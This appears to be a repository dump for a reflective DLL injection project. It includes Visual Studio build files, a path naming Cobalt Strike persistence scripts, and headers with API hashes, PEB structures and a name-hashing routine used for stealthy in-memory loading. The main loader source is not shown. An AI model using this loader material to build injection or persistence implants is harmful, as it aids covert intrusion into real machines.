140 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 141 | true 142 | EnableFastChecks 143 | MultiThreadedDebugDLL 144 | 145 | 146 | Level3 147 | EditAndContinue 148 | 149 | 150 | true 151 | Windows 152 | 153 | 154 | 155 | 156 | X64 157 | 158 | 159 | Disabled 160 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 161 | true 162 | EnableFastChecks 163 | MultiThreadedDebugDLL 164 | 165 | Level3 166 | ProgramDatabase 167 | 168 | 169 | true 170 | Windows 171 | MachineX64 172 | 173 | 174 | 175 | 176 | MaxSpeed 177 | OnlyExplicitInline 178 | true 179 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 180 | MultiThreaded 181 | true 182 | 183 | Level3 184 | ProgramDatabase 185 | 186 | 187 | false 188 | Windows 189 | true 190 | true 191 | MachineX86 192 | 193 | 194 | copy ..\Release\reflective_dll.dll ..\bin\ 195 | 196 | 197 | 198 | 199 | MinSpace 200 | OnlyExplicitInline 201 | true 202 | WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 203 | MultiThreaded 204 | true 205 | 206 | 207 | Level3 208 | ProgramDatabase 209 | true 210 | Default 211 | 212 | 213 | true 214 | Windows 215 | true 216 | true 217 | $(OutDir)$(ProjectName).arm.dll 218 | 219 | 220 | copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\ 221 | 222 | 223 | 224 | 225 | X64 226 | 227 | 228 | MaxSpeed 229 | OnlyExplicitInline 230 | true 231 | Size 232 | false 233 | WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions) 234 | MultiThreaded 235 | true 236 | 237 | Level3 238 | ProgramDatabase 239 | CompileAsCpp 240 | D:\ActivePart\Code\VS2019\CobaltStrike_script\Persistence\WinServices\CreateService_DLL\dll\src;%(AdditionalIncludeDirectories) 241 | 242 | 243 | $(OutDir)$(ProjectName).x64.dll 244 | true 245 | Windows 246 | true 247 | true 248 | MachineX64 249 | 250 | 251 | copy $(OutDir)$(ProjectName).x64.dll ..\bin\ 252 | 253 | 254 | 255 | 256 | 257 | 258 | 259 | 260 | 261 | 262 | 263 | 264 | 265 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/src/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | 34 | // we declare some common stuff in here... 35 | 36 | #define DLL_QUERY_HMODULE 6 37 | 38 | #define DEREF( name )*(UINT_PTR *)(name) 39 | #define DEREF_64( name )*(DWORD64 *)(name) 40 | #define DEREF_32( name )*(DWORD *)(name) 41 | #define DEREF_16( name )*(WORD *)(name) 42 | #define DEREF_8( name )*(BYTE *)(name) 43 | 44 | typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID ); 45 | typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); 46 | 47 | #define DLLEXPORT __declspec( dllexport ) 48 | 49 | //===============================================================================================// 50 | #endif 51 | //===============================================================================================// 52 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/src/ReflectiveDll.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/dll/src/ReflectiveDll.c -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/src/ReflectiveLoader.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H 30 | //===============================================================================================// 31 | #define WIN32_LEAN_AND_MEAN 32 | #include 33 | #include 34 | #include 35 | 36 | #include "ReflectiveDLLInjection.h" 37 | 38 | typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); 39 | typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); 40 | typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); 41 | typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); 42 | 43 | #define KERNEL32DLL_HASH 0x6A4ABC5B 44 | #define NTDLLDLL_HASH 0x3CFA685D 45 | 46 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 47 | #define GETPROCADDRESS_HASH 0x7C0DFCAA 48 | #define VIRTUALALLOC_HASH 0x91AFCA54 49 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 50 | 51 | #define IMAGE_REL_BASED_ARM_MOV32A 5 52 | #define IMAGE_REL_BASED_ARM_MOV32T 7 53 | 54 | #define ARM_MOV_MASK (DWORD)(0xFBF08000) 55 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) 56 | #define ARM_MOVW 0xF2400000 57 | #define ARM_MOVT 0xF2C00000 58 | 59 | #define HASH_KEY 13 60 | //===============================================================================================// 61 | #pragma intrinsic( _rotr ) 62 | 63 | __forceinline DWORD ror( DWORD d ) 64 | { 65 | return _rotr( d, HASH_KEY ); 66 | } 67 | 68 | __forceinline DWORD hash( char * c ) 69 | { 70 | register DWORD h = 0; 71 | do 72 | { 73 | h = ror( h ); 74 | h += *c; 75 | } while( *++c ); 76 | 77 | return h; 78 | } 79 | //===============================================================================================// 80 | typedef struct _UNICODE_STR 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR pBuffer; 85 | } UNICODE_STR, *PUNICODE_STR; 86 | 87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY 88 | //__declspec( align(8) ) 89 | typedef struct _LDR_DATA_TABLE_ENTRY 90 | { 91 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 92 | LIST_ENTRY InMemoryOrderModuleList; 93 | LIST_ENTRY InInitializationOrderModuleList; 94 | PVOID DllBase; 95 | PVOID EntryPoint; 96 | ULONG SizeOfImage; 97 | UNICODE_STR FullDllName; 98 | UNICODE_STR BaseDllName; 99 | ULONG Flags; 100 | SHORT LoadCount; 101 | SHORT TlsIndex; 102 | LIST_ENTRY HashTableEntry; 103 | ULONG TimeDateStamp; 104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 105 | 106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA 107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes 108 | { 109 | DWORD dwLength; 110 | DWORD dwInitialized; 111 | LPVOID lpSsHandle; 112 | LIST_ENTRY InLoadOrderModuleList; 113 | LIST_ENTRY InMemoryOrderModuleList; 114 | LIST_ENTRY InInitializationOrderModuleList; 115 | LPVOID lpEntryInProgress; 116 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 117 | 118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK 119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes 120 | { 121 | struct _PEB_FREE_BLOCK * pNext; 122 | DWORD dwSize; 123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 124 | 125 | // struct _PEB is defined in Winternl.h but it is incomplete 126 | // WinDbg> dt -v ntdll!_PEB 127 | typedef struct __PEB // 65 elements, 0x210 bytes 128 | { 129 | BYTE bInheritedAddressSpace; 130 | BYTE bReadImageFileExecOptions; 131 | BYTE bBeingDebugged; 132 | BYTE bSpareBool; 133 | LPVOID lpMutant; 134 | LPVOID lpImageBaseAddress; 135 | PPEB_LDR_DATA pLdr; 136 | LPVOID lpProcessParameters; 137 | LPVOID lpSubSystemData; 138 | LPVOID lpProcessHeap; 139 | PRTL_CRITICAL_SECTION pFastPebLock; 140 | LPVOID lpFastPebLockRoutine; 141 | LPVOID lpFastPebUnlockRoutine; 142 | DWORD dwEnvironmentUpdateCount; 143 | LPVOID lpKernelCallbackTable; 144 | DWORD dwSystemReserved; 145 | DWORD dwAtlThunkSListPtr32; 146 | PPEB_FREE_BLOCK pFreeList; 147 | DWORD dwTlsExpansionCounter; 148 | LPVOID lpTlsBitmap; 149 | DWORD dwTlsBitmapBits[2]; 150 | LPVOID lpReadOnlySharedMemoryBase; 151 | LPVOID lpReadOnlySharedMemoryHeap; 152 | LPVOID lpReadOnlyStaticServerData; 153 | LPVOID lpAnsiCodePageData; 154 | LPVOID lpOemCodePageData; 155 | LPVOID lpUnicodeCaseTableData; 156 | DWORD dwNumberOfProcessors; 157 | DWORD dwNtGlobalFlag; 158 | LARGE_INTEGER liCriticalSectionTimeout; 159 | DWORD dwHeapSegmentReserve; 160 | DWORD dwHeapSegmentCommit; 161 | DWORD dwHeapDeCommitTotalFreeThreshold; 162 | DWORD dwHeapDeCommitFreeBlockThreshold; 163 | DWORD dwNumberOfHeaps; 164 | DWORD dwMaximumNumberOfHeaps; 165 | LPVOID lpProcessHeaps; 166 | LPVOID lpGdiSharedHandleTable; 167 | LPVOID lpProcessStarterHelper; 168 | DWORD dwGdiDCAttributeList; 169 | LPVOID lpLoaderLock; 170 | DWORD dwOSMajorVersion; 171 | DWORD dwOSMinorVersion; 172 | WORD wOSBuildNumber; 173 | WORD wOSCSDVersion; 174 | DWORD dwOSPlatformId; 175 | DWORD dwImageSubsystem; 176 | DWORD dwImageSubsystemMajorVersion; 177 | DWORD dwImageSubsystemMinorVersion; 178 | DWORD dwImageProcessAffinityMask; 179 | DWORD dwGdiHandleBuffer[34]; 180 | LPVOID lpPostProcessInitRoutine; 181 | LPVOID lpTlsExpansionBitmap; 182 | DWORD dwTlsExpansionBitmapBits[32]; 183 | DWORD dwSessionId; 184 | ULARGE_INTEGER liAppCompatFlags; 185 | ULARGE_INTEGER liAppCompatFlagsUser; 186 | LPVOID lppShimData; 187 | LPVOID lpAppCompatInfo; 188 | UNICODE_STR usCSDVersion; 189 | LPVOID lpActivationContextData; 190 | LPVOID lpProcessAssemblyStorageMap; 191 | LPVOID lpSystemDefaultActivationContextData; 192 | LPVOID lpSystemAssemblyStorageMap; 193 | DWORD dwMinimumStackCommit; 194 | } _PEB, * _PPEB; 195 | 196 | typedef struct 197 | { 198 | WORD offset:12; 199 | WORD type:4; 200 | } IMAGE_RELOC, *PIMAGE_RELOC; 201 | //===============================================================================================// 202 | #endif 203 | //===============================================================================================// 204 | -------------------------------------------------------------------------------- /Service_Reflective_dll/rdi.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30503.244 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|ARM = Debug|ARM 11 | Debug|Win32 = Debug|Win32 12 | Debug|x64 = Debug|x64 13 | Release|ARM = Release|ARM 14 | Release|Win32 = Release|Win32 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM 19 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM 20 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 21 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 22 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64 23 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64 24 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM 25 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM 26 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 27 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 28 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64 29 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {D658A35B-5F5E-4201-B1C2-902B8DC53354} 36 | EndGlobalSection 37 | EndGlobal 38 | --------------------------------------------------------------------------------